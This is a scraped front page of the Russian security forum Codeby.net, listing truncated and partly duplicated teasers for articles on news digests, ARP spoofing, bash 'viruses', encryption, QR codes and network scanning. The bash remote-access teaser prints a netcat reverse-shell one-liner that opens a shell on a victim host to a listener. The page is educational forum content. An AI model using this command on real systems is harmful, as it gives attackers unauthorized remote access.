-
Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе
Форум информационной безопасности - Codeby.net
Статья Новостной дайджест по ИБ/IT за 23.05-30.05
Доброго времени суток, уважаемые форумчане! За прошедшую неделю произошло много всего интересного. Также, помимо привычных новостей и рубрик “блиц” и “очередные блокировки”, я решил добавить ещё одну рубрику, которая позволит вам узнать об интересных статьях на форуме и будет в самом конце дайджеста. Чтож, перейдём к новостям!
Сервера Dark Souls возвращаются
Bandai Namco и FromSoftware сообщили о том, что они продолжают восстанавливать работоспособность игровых серверов для ПК трилогии Dark Souls.
23 января разработчики отключили все игровые сервера серии Dark Souls. На протяжении нескольких месяцев разработчики никак не комментировали ситуацию. Теперь разработчики пояснили, что локализовали причину проблемы в сетевом коде и занимаются выпуском патча.
Возвращать серверы к работе планируется по очереди, начиная с Dark Souls III.
Дату и время запуска серверов опубликуют...
Сервера Dark Souls возвращаются
Bandai Namco и FromSoftware сообщили о том, что они продолжают восстанавливать работоспособность игровых серверов для ПК трилогии Dark Souls.
23 января разработчики отключили все игровые сервера серии Dark Souls. На протяжении нескольких месяцев разработчики никак не комментировали ситуацию. Теперь разработчики пояснили, что локализовали причину проблемы в сетевом коде и занимаются выпуском патча.
Возвращать серверы к работе планируется по очереди, начиная с Dark Souls III.
Дату и время запуска серверов опубликуют...
Статья Немного о MITM или ARP-spoofing с помощью Python
Об ARP-спуфинге говорят немало. Это один из простейших видов атаки Man-in-the-Middle. Решил и я внести посильный вклад в копилку информации, ибо не обошло это и меня, как начинающего писать код. Далее я опишу код на Python, который делает рассылку ARP-ответов атакуемой машине и роутеру. О целесообразности данного вида атак я напишу немного ниже.
Целесообразность данного вида атаки
Самая большая сложность будет заключаться в том, чтобы подсоединиться к атакуемой сети. И если, в случае с общественными Wi-Fi сетями проблем особых не возникнет, то вот подключение к сетям в каких-либо организациях может вызвать некоторые сложности. Но, предположим, что вы подключились. И тут начинается интересное. Многие сейчас начнут говорить о том, что современные маршрутизаторы защищены от данного вида атак. И да, так оно и есть. Вполне себе дорогущие Cisco. Но много ли таких маршрутизаторов стоит в организациях? Это уже...
Целесообразность данного вида атаки
Самая большая сложность будет заключаться в том, чтобы подсоединиться к атакуемой сети. И если, в случае с общественными Wi-Fi сетями проблем особых не возникнет, то вот подключение к сетям в каких-либо организациях может вызвать некоторые сложности. Но, предположим, что вы подключились. И тут начинается интересное. Многие сейчас начнут говорить о том, что современные маршрутизаторы защищены от данного вида атак. И да, так оно и есть. Вполне себе дорогущие Cisco. Но много ли таких маршрутизаторов стоит в организациях? Это уже...
Статья Написание программы для удалённого доступа на bash. Попытка первая.
Всем читающим привет, сегодня хотелось бы поговорить о вирусах на Bash. Начнём с элементарного.
Статья написана в целях ознакомления и не призывает к действию!
Одним из самых основных инструментов сетевого взаимодействия в Linux является netcat и с помощью него можно создать простейший вирус, буквально в одну строку.
Эта команда дарует вам шелл на хост жертвы.
Но сейчас это уже не работает, т.к. вряд ли безопасно выполнять команды принятые по незащищённому соединению и это понимают все. Поэтому сейчас почти ни в одном линуксе не будет работать опция -e.
Теперь перейдём к более интересным вещам, а именно созданию более-менее полноценного реверс-шелла. Где-то с костылями, где-то со странными решениями, но для меня это скорее исследовательская работа.
Для начала на нашу тестовую мшину нужно установить netcat.
Статья написана в целях ознакомления и не призывает к действию!
Одним из самых основных инструментов сетевого взаимодействия в Linux является netcat и с помощью него можно создать простейший вирус, буквально в одну строку.
Эта команда дарует вам шелл на хост жертвы.
Bash:
nc -nv 192.168.0.178 4444 -e /bin/bashНо сейчас это уже не работает, т.к. вряд ли безопасно выполнять команды принятые по незащищённому соединению и это понимают все. Поэтому сейчас почти ни в одном линуксе не будет работать опция -e.
Теперь перейдём к более интересным вещам, а именно созданию более-менее полноценного реверс-шелла. Где-то с костылями, где-то со странными решениями, но для меня это скорее исследовательская работа.
Для начала на нашу тестовую мшину нужно установить netcat.
Bash:
sudo apt...Статья Историческая вирусология или LoveLetter в цвете современности - 22 года спустя | немного ностальгии
Немного ностальгии: историческая вирусология или LoveLetter в цвете современности - 22 года спустя
И приветики, как бы.. Думаю, что о мне уже многие успели и забыть, а оно и не странно, ведь последняя моя работа датирована концом февраля. Я здесь не говорить о том, что случилось, как и где, не буду рассуждать кто прав, кто виноват, а тем уж более судить. Почему? Не хочу, все это обсуждалось уже миллионы раз, нет.. Миллиарды. А есть ли в этом смысл? Тогда расскажите мне каков.
Итак, переходим сразу к сути. Давненько я не брался за перо, скажем так, в ряду обстоятельств, поэтому вряд-ли выйдет что-то супер годное, коль у нас лишь обычная подборочка: без сюжета ( в процессе передумал), без пафоса.
В статье есть обороты личности: рассказ ведется то от лица автора, то от лица персонажа.
Щелчок пальцев; тишина; начинаем погружение в мир...
Анонс 🔥 Интервью с победителем The Standoff 2022!
Друзья, рады вам сообщить, что уже в это воскресенье мы проведём стрим-интервью!
Специальный гость - Павел Шмидт. Создатель канала @APT_Notes, а также участник команды Codeby с 2019 года. Павел активно изучает техники Pentest, Red-Team, OSINT и обладает большим количеством сертификатов по ИБ.
Не пропусти и ставь себе напоминалку! 29 мая в 18:00 по московскому времени. Ждём каждого!
Смотрите стрим на нашем Youtube каналеСтатья Создание и чтение QR-кода с Python
Еще недавно QR-коды были актуальны как никогда. Но, тьфу-тьфу, надеюсь, что все осталось позади. Тем не менее, эти коды быстрого доступа довольно удобны и используются повсеместно. Поэтому нелишним будет создать приложение, которое их создает. Ну и добавить туда чуть-чуть функционала. Никакого открытия Америки, все довольно просто и банально.
Что понадобиться?
Понадобиться, несмотря на простоту кода довольно много библиотек. Библиотека qrcode, для создания кода, библиотека path для работы с путями. opencv-python для распознавания картинки с кодом. pyzbar для считывания кодов. И еще нужен будет небольшой модуль, который я нашел и который делает создание кода довольно забавным делом. Об этом будет подробнее ниже. А сейчас, устанавливаем библиотеки:
После чего импортируем в модуль:
Что понадобиться?
Понадобиться, несмотря на простоту кода довольно много библиотек. Библиотека qrcode, для создания кода, библиотека path для работы с путями. opencv-python для распознавания картинки с кодом. pyzbar для считывания кодов. И еще нужен будет небольшой модуль, который я нашел и который делает создание кода довольно забавным делом. Об этом будет подробнее ниже. А сейчас, устанавливаем библиотеки:
pip install opencv-python qrcode[pil] pyzbar pathПосле чего импортируем в модуль:
Python:
import...Статья Шифрование файлов директории с помощью гибридного алгоритма в Python
Когда нужно скрыть приватные данные от чужих глаз мы, чаще всего, вспоминаем о шифровании. Ведь даже если зашифрованный файл попадет в руки человека, для которого он не предназначен, тот не сможет прочесть или увидеть его содержимое без расшифровки. А пароль или ключ для расшифровки есть только у того, кто его зашифровал, либо у того, кому и предназначался зашифрованный файл. Шифрование осуществляется с помощью специальных алгоритмов, которые основаны на различных технологиях, но делают одно общее дело – а именно скрывают данные от чужих глаз. Давайте разберемся, какие есть алгоритмы и попытаемся реализовать шифрование данных на Python.
На самом деле дело не ограничивается только лишь шифрованием файлов. И так или иначе, но все мы сталкиваемся с различными видами шифрования практически каждый день. Например, при посещении сайтов с протоколом HTTPS или при совершении покупок в интернете с помощью карты.
Симметричное и...
На самом деле дело не ограничивается только лишь шифрованием файлов. И так или иначе, но все мы сталкиваемся с различными видами шифрования практически каждый день. Например, при посещении сайтов с протоколом HTTPS или при совершении покупок в интернете с помощью карты.
Симметричное и...
Статья Сканер локальной сети для получения списка IP и MAC адресов на Python
На данный момент в различных операционных системах существует довольно много самых разнообразных сканеров сети, которые не только составят вам ее карту, но, также покажут, какие сетевые ресурсы доступны на каждой из найденных машин, их сетевые имена. Но, почему бы не сделать свой сканер на Python, который будет составлять карту сети, хоть и без сетевых ресурсов на данном этапе, но, тем не менее, работать он будет довольно быстро и в качестве практики очень даже полезно.
Что понадобится?
Для того, чтобы создать быстрый сканер сети, с возможностью его дальнейшего расширения, нам понадобиться установить scapy. Это многофункциональная библиотека, которая позволяет отправлять, анализировать и подделывать сетевые пакеты, а также сканировать или атаковать сети. Установка ее достаточно простая. Нужно написать в терминале команду:
Однако, это не...
Что понадобится?
Для того, чтобы создать быстрый сканер сети, с возможностью его дальнейшего расширения, нам понадобиться установить scapy. Это многофункциональная библиотека, которая позволяет отправлять, анализировать и подделывать сетевые пакеты, а также сканировать или атаковать сети. Установка ее достаточно простая. Нужно написать в терминале команду:
pip install --pre scapy[basic]Однако, это не...
Статья Новостной дайджест по ИБ/IT за 16.05-23.05
Доброго времени суток, уважаемые форумчане! Пролетела очередная неделя, а я слегка приболел, поэтому новостей чуть меньше, чем обычно.. Приятного чтения!
Microsoft выпустила патч
В прошлом выпуске новостей вы прочитали про два “очень весёлых” обновления.
Обновление безопасности для Windows вызывающее сбои аутентификации при использовании Active Directory на контроллерах доменов можно-было исправить посредством изменения значения в реестре. Однако, пойдя по этому пути вы подвергались уязвимостям CVE-2022-26931 и CVE-2022-26923.
Теперь Microsoft выпустила новый патч, который исправляет ошибки аутентификации и защищает от вышеупомянутых уязвимостей.
Патч распространяется только по каналу распространения обновления OOB (out of band)
Microsoft выпустила патч
В прошлом выпуске новостей вы прочитали про два “очень весёлых” обновления.
Обновление безопасности для Windows вызывающее сбои аутентификации при использовании Active Directory на контроллерах доменов можно-было исправить посредством изменения значения в реестре. Однако, пойдя по этому пути вы подвергались уязвимостям CVE-2022-26931 и CVE-2022-26923.
Теперь Microsoft выпустила новый патч, который исправляет ошибки аутентификации и защищает от вышеупомянутых уязвимостей.
Патч распространяется только по каналу распространения обновления OOB (out of band)
Статья Простой «шпионский» HTTP-сервер на Python
Создать свой собственный HTTP сервер на питоне достаточно просто. Буквально несколько строк кода. И это может быть как файловый сервер, так и сервер, который просто отдает нам странички по запросу. Возьмем для примера сервер, который устанавливается вместе с программой calibre. При должной настройке данный сервер можно использовать как полноценный сайт библиотеки. Но calibre тут только для примера. А суть вот в чем. Когда вы скачиваете себе какой-либо медиасервер и устанавливаете его себе в систему, есть ли у вас уверенность в том, что у данного сервера только лишь тот функционал, который описан в документации? Ведь на самом деле, здесь открывается довольно большое поле для творчества. И давайте посмотрим, какое именно.
Я не буду описывать здесь, как создать именно сервер для просмотра страничек. Вместо этого мы создадим сервер, который...
Я не буду описывать здесь, как создать именно сервер для просмотра страничек. Вместо этого мы создадим сервер, который...
Codeby Games CTF
Категории блога
Наши курсы
Пользователи онлайн
- olegsh
- EvgeniyN
- D4ckD4ck
- coder32
- Iri
- Ayagoz Nurlankyzy
- hardserv
- Azamat Taizhanov
- Elvin
- Denis808
- Iveh3ve
- Anton_mak
- coco cocos
- Soznanie
- Даулет Мырзахмет
- Code_User
- ondasynov04
- Fl1nt
- VMo0n
- MT777
- monslegend
- Klaider
- Miklovan78
- D3L1F3R
- yetiraki
- Geosmg
- Roomka
- kvmnsk
- savl
- Nikita Budnikov
- Exited3n
- lmike
- Incocnito_
- MrHacker1337_228
- start120
- NeRV
- Evgeny D
- Murex Arvix
- poiuuyyyuuyu
- misterX
- mttidd1
Наши книги
